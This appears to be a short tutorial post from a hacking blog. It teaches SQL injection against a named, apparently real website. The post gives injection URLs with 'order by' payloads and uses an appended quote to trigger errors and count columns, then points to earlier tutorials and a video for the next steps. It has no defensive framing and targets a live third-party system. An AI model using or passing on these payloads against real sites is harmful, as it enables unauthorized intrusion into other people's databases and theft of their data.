Welcome to www.n0bz.com today i gonna show you how to inject website when we can't find Order by so lets start
i have this one vulnerability site
http://www.cma.co.in/cma_newsupdates.php?id=12
now trying to find order using following command
http://www.cma.co.in/cma_newsupdates.php?id=12 order by 10--+- (No Error)
http://www.cma.co.in/cma_newsupdates.php?id=12 order by 10--+- (No Error)
http://www.cma.co.in/cma_newsupdates.php?id=12order by 500--+- (No Error)
we put highest value but we cant found any error :( dont worry i will tell you how to do this :)
Now we need to add ' in the url end then we got error
you can see this when i put ' in the url end i got error its has 5 order now we need to find this version i hope you know that how to do this in previous tutorials :)
Watch Video
Sign up here with your email